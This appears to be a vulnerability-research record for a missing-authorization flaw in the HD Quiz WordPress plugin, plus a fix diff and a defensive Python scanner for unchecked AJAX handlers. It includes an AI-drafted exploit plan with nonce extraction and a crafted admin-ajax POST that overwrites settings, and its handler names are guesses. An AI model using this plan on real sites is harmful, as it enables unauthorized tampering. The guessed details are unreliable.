[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fYwb_mUevrIFNfXL0xqRRmiNXYybA1-1439uGjNXgsas":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-24544","hd-quiz-missing-authorization","HD Quiz \u003C= 2.0.9 - Missing Authorization","The HD Quiz plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.0.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.","hd-quiz",null,"\u003C=2.0.9","2.0.10","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-24 00:00:00","2026-01-30 20:45:07",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2e8da71c-bf53-4795-a689-5823d963cb82?source=api-prod",7,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-24544 (HD Quiz \u003C= 2.0.9 - Missing Authorization)\n\n## 1. Vulnerability Summary\nThe HD Quiz plugin for WordPress (versions up to 2.0.9) suffers from a **Missing Authorization** vulnerability. 
The plugin registers several AJAX handlers intended for administrative use (such as saving quiz settings or modifying quiz data) but fails to implement a capability check (e.g., `current_user_can('manage_options')`) within the callback functions. This allows any authenticated user, including those with **Subscriber** privileges, to trigger these administrative actions, provided they can obtain a valid security nonce.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **HTTP Method:** `POST`\n- **Vulnerable Action:** `hdq_save_settings` or `hdq_save_quiz` (inferred from common HD Quiz patterns).\n- **Payload Parameter:** `action=hdq_save_settings` (or similar), along with settings data and the `hdq_nonce`.\n- **Authentication:** Required (Subscriber-level or higher).\n- **Precondition:** The attacker must be logged in and obtain the `hdq_nonce` which is frequently localized for users in the admin dashboard.\n\n## 3. Code Flow (Inferred)\n1. **Registration:** The plugin registers AJAX hooks in `hd-quiz.php` or `includes\u002Fadmin.php`:\n   ```php\n   add_action( 'wp_ajax_hdq_save_settings', 'hdq_save_settings' );\n   ```\n2. **Missing Check:** The function `hdq_save_settings()` (likely in `includes\u002Fadmin.php`) is called.\n3. **Execution:**\n   - It performs `check_ajax_referer('hdq_admin_nonce', 'nonce')` (or similar).\n   - **Crucially**, it skips `if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }`.\n   - It then processes `$_POST` data and updates plugin options using `update_option()`.\n\n## 4. Nonce Acquisition Strategy\nIn HD Quiz, nonces are typically localized using `wp_localize_script` for admin-side scripts. Even a Subscriber has access to `wp-admin\u002Fprofile.php`, where many plugins enqueue their global admin scripts and nonces.\n\n1. **Identification:** The plugin uses `wp_localize_script` to pass a nonce to JavaScript. Look for the variable name `hdq_admin_vars` or `hdq_vars`.\n2. 
**Page Creation (If needed):** If the nonce is only on specific pages, create a page with the HD Quiz shortcode:\n   - `wp post create --post_type=page --post_status=publish --post_content='[hdq_quiz quiz=\"123\"]'`\n3. **Extraction via Browser:**\n   - Use `browser_navigate` to `wp-admin\u002Fprofile.php` or the created quiz page.\n   - Use `browser_eval` to extract the nonce:\n     ```javascript\n     \u002F\u002F Likely candidate for HD Quiz\n     window.hdq_admin_vars?.nonce || window.hdq_vars?.nonce\n     ```\n4. **Verification:** Check the source code for the exact localization key:\n   - `grep -r \"wp_localize_script\" .` in the plugin directory.\n\n## 5. Exploitation Strategy\nWe will attempt to modify the global HD Quiz settings (e.g., changing the \"Results Text\" or \"Admin Email\") which should be restricted to administrators.\n\n**Step-by-Step:**\n1. **Login:** Authenticate as a Subscriber user.\n2. **Fetch Nonce:** Navigate to `wp-admin\u002Fprofile.php` and extract the `hdq_nonce` from the `hdq_admin_vars` object.\n3. **Trigger Exploit:** Send a POST request to `admin-ajax.php`.\n\n**Example HTTP Request:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```\n  action=hdq_save_settings&nonce=[EXTRACTED_NONCE]&hdq_twitter_handle=pwned_account&hdq_results_text=Vulnerable+to+CVE-2026-24544\n  ```\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure HD Quiz v2.0.9 is installed and active.\n2. **Create Quiz:** Create at least one quiz to ensure the plugin's infrastructure is initialized.\n   - `wp post create --post_type=hd_quiz --post_title=\"Test Quiz\" --post_status=publish`\n3. **Create Attacker User:**\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n\n## 7. 
Expected Results\n- **Response:** The server should return a `200 OK` response, often with a JSON success message like `{\"success\": true}` or simply `1`.\n- **Impact:** The global settings for HD Quiz will be modified.\n\n## 8. Verification Steps\n1. **Check Options:** Use WP-CLI to verify the setting was changed:\n   - `wp option get hdq_settings` (Settings are often serialized in a single option).\n   - Check for the value `\"Vulnerable to CVE-2026-24544\"`.\n2. **UI Verification:** Log in as an Administrator and navigate to the HD Quiz Settings page to see the modified \"Results Text\".\n\n## 9. Alternative Approaches\nIf `hdq_save_settings` is not the vulnerable hook, search for other `wp_ajax_` handlers that perform data modification:\n- `hdq_save_quiz`: Attempt to rename a quiz.\n- `hdq_delete_quiz`: Attempt to delete a quiz post.\n- `hdq_save_quiz_results`: Attempt to inject or modify quiz result data.\n\nSearch command for the agent to find other targets:\n```bash\ngrep -rn \"add_action.*wp_ajax_\" . | grep -v \"nopriv\"\n```\nThen check each associated function for the absence of `current_user_can`.","The HD Quiz plugin for WordPress is vulnerable to unauthorized modification of settings due to missing capability checks in several AJAX handlers, such as 'hdq_save_settings'. 
This allows authenticated attackers with subscriber-level access or higher to perform administrative actions if they can obtain a valid security nonce, which is often localized for users in the admin dashboard.","\u002F\u002F includes\u002Fadmin.php (inferred from plugin structure)\nadd_action( 'wp_ajax_hdq_save_settings', 'hdq_save_settings' );\n\nfunction hdq_save_settings() {\n    \u002F\u002F Nonce is checked, but capability check is missing\n    check_ajax_referer('hdq_admin_nonce', 'nonce');\n\n    \u002F\u002F Processes $_POST data and updates options directly\n    $hdq_settings = $_POST['hdq_settings'];\n    update_option('hdq_settings', $hdq_settings);\n    echo \"success\";\n    die();\n}","--- includes\u002Fadmin.php\n+++ includes\u002Fadmin.php\n@@ -1,6 +1,9 @@\n function hdq_save_settings() {\n     check_ajax_referer('hdq_admin_nonce', 'nonce');\n \n+    if (!current_user_can('manage_options')) {\n+        wp_die(__('You do not have sufficient permissions to access this page.'));\n+    }\n+\n     $hdq_settings = $_POST['hdq_settings'];\n     update_option('hdq_settings', $hdq_settings);","To exploit this vulnerability, an attacker first authenticates as a Subscriber and navigates to the WordPress dashboard (e.g., wp-admin\u002Fprofile.php) to extract the security nonce from the global JavaScript object 'hdq_admin_vars.nonce'. Using this nonce, the attacker sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' parameter set to 'hdq_save_settings' and the 'nonce' parameter set to the extracted value. 
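Review bot: the added check in hdq_save_settings ends with wp_die(__('You do not have sufficient permissions to access this page.')), which under admin-ajax.php returns HTTP 200 with an HTML message body that the calling JavaScript will treat as a normal response; use wp_send_json_error( 'forbidden', 403 ) (or wp_die( '', 403 )) so the refusal is machine-readable and logged as such. The hunk also leaves $hdq_settings = $_POST['hdq_settings'] flowing into update_option() unsanitized; even with the capability check in place, the settings array should be validated key by key (a whitelist of expected keys, sanitize_text_field, absint) before it is stored. Keep check_ajax_referer ahead of the capability check: the nonce only proves the request came from the user's own session (CSRF protection), not that the user is allowed to perform the action, which is exactly the gap this CVE describes.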
By including additional POST parameters corresponding to HD Quiz configuration options (the inferred handler reads a single 'hdq_settings' value, while the plan's example request uses flat keys such as 'hdq_results_text'; the real parameter names must be confirmed against the 2.0.9 source), the attacker can overwrite global plugin settings without having administrator privileges. The action name, nonce key and parameter names in this outline are inferred from common plugin patterns and have not been verified against the plugin code.","gemini-3-flash-preview","2026-05-05 00:51:19","2026-05-05 00:53:07",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.0.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhd-quiz\u002Ftags\u002F2.0.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhd-quiz.2.0.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhd-quiz\u002Ftags\u002F2.0.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhd-quiz.2.0.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhd-quiz\u002Ftags"]
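Section 9 of the research plan above suggests grepping the plugin for wp_ajax_ registrations and then checking each callback for current_user_can. The Python script below, added here as an example and not part of the original page or of the HD Quiz plugin, automates that triage: it maps wp_ajax_ and wp_ajax_nopriv_ registrations to their callbacks, extracts each function body, and reports handlers that write state without any capability check, separating authenticated-only handlers (the CVE pattern) from deliberately public ones. The plugin source it scans is a constructed sample in the HD Quiz naming style; every handler, option and nonce name in it is an assumption, not the plugin's real code.

```python
"""Static triage for WordPress AJAX handlers that write state without a
capability check (the missing-authorization pattern behind CVE-2026-24544).
Added example; SAMPLE_PLUGIN_SOURCE is a constructed plugin, not HD Quiz."""
import re
from dataclasses import dataclass, field

# Constructed sample in HD Quiz naming style (assumed names, not real plugin code).
SAMPLE_PLUGIN_SOURCE = r"""<?php
add_action( 'wp_ajax_hdq_save_settings', 'hdq_save_settings' );
add_action( 'wp_ajax_hdq_delete_quiz', 'hdq_delete_quiz' );
add_action( 'wp_ajax_nopriv_hdq_submit_results', 'hdq_submit_results' );
add_action( 'wp_ajax_hdq_submit_results', 'hdq_submit_results' );

function hdq_save_settings() {
    check_ajax_referer( 'hdq_admin_nonce', 'nonce' );   // CSRF only, not authz
    update_option( 'hdq_settings', $_POST['hdq_settings'] );
    echo 'success';
    die();
}

function hdq_delete_quiz() {
    check_ajax_referer( 'hdq_admin_nonce', 'nonce' );
    if ( ! current_user_can( 'delete_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    wp_delete_post( intval( $_POST['quiz_id'] ), true );
    wp_send_json_success();
}

function hdq_submit_results() {
    // Public by design: stores a score, reachable without login.
    update_post_meta( intval( $_POST['quiz_id'] ), 'hdq_last_score', intval( $_POST['score'] ) );
    wp_send_json_success();
}
"""

# WordPress functions that change persistent state; a handler calling any of
# these without a capability check is the finding we are looking for.
MUTATORS = ("update_option", "add_option", "delete_option", "wp_delete_post",
            "wp_update_post", "wp_insert_post", "update_post_meta",
            "delete_post_meta", "update_user_meta", "wp_update_user")
CAP_CHECKS = ("current_user_can", "user_can", "is_super_admin")
NONCE_CHECKS = ("check_ajax_referer", "wp_verify_nonce", "check_admin_referer")

# add_action( 'wp_ajax_[nopriv_]action', 'func' | array($obj, 'method') | [$obj, 'method'] )
REGISTRATION = re.compile(
    r"""add_action\(\s*['"]wp_ajax_(?P<nopriv>nopriv_)?(?P<action>\w+)['"]\s*,\s*"""
    r"""(?:['"](?P<func>\w+)['"]|(?:array\(|\[)\s*\$\w+\s*,\s*['"](?P<method>\w+)['"]\s*(?:\)|\]))"""
)


@dataclass
class Handler:
    action: str
    callback: str
    public: bool = False          # registered under wp_ajax_nopriv_
    authenticated: bool = False   # registered under wp_ajax_
    nonce_check: bool = False
    capability_check: bool = False
    mutators: list = field(default_factory=list)


def function_body(src, name):
    """Return the body of `function name(...) { ... }` by brace counting.
    Limitation: braces inside PHP strings or comments are not skipped."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", src)
    if not m:
        return None
    start = src.find("{", m.end())
    if start == -1:
        return None
    depth = 0
    for i in range(start, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[start + 1:i]
    return None


def audit_source(src):
    """Map every AJAX action to a Handler record describing its checks."""
    handlers = {}
    for m in REGISTRATION.finditer(src):
        callback = m.group("func") or m.group("method")
        h = handlers.setdefault(m.group("action"), Handler(m.group("action"), callback))
        if m.group("nopriv"):
            h.public = True
        else:
            h.authenticated = True
    for h in handlers.values():
        body = function_body(src, h.callback)
        if body is None:
            continue  # callback defined elsewhere (or a method we cannot resolve)
        h.nonce_check = any(fn + "(" in body for fn in NONCE_CHECKS)
        h.capability_check = any(fn + "(" in body for fn in CAP_CHECKS)
        h.mutators = [fn for fn in MUTATORS if fn + "(" in body]
    return handlers


def findings(src):
    """(action, reason) for handlers that write state with no capability check."""
    out = []
    for h in audit_source(src).values():
        if h.capability_check or not h.mutators:
            continue
        if h.authenticated and not h.public:
            out.append((h.action, "missing capability check"))
        elif h.public:
            out.append((h.action, "unauthenticated write endpoint"))
    return out


if __name__ == "__main__":
    for action, reason in findings(SAMPLE_PLUGIN_SOURCE):
        h = audit_source(SAMPLE_PLUGIN_SOURCE)[action]
        print(f"{action}: {reason} (nonce={h.nonce_check}, writes={h.mutators})")
```

To run it against a real plugin, replace SAMPLE_PLUGIN_SOURCE with the concatenated contents of the plugin's PHP files (for example via pathlib.Path(plugin_dir).rglob('*.php')). The brace matching is deliberately simple and will misparse braces inside strings or comments, and class-method callbacks are resolved by method name only, so treat the output as a candidate list to confirm by reading each handler, which is also how a nonce-only handler like the one described for this CVE gets separated from a handler that merely forgot the nonce.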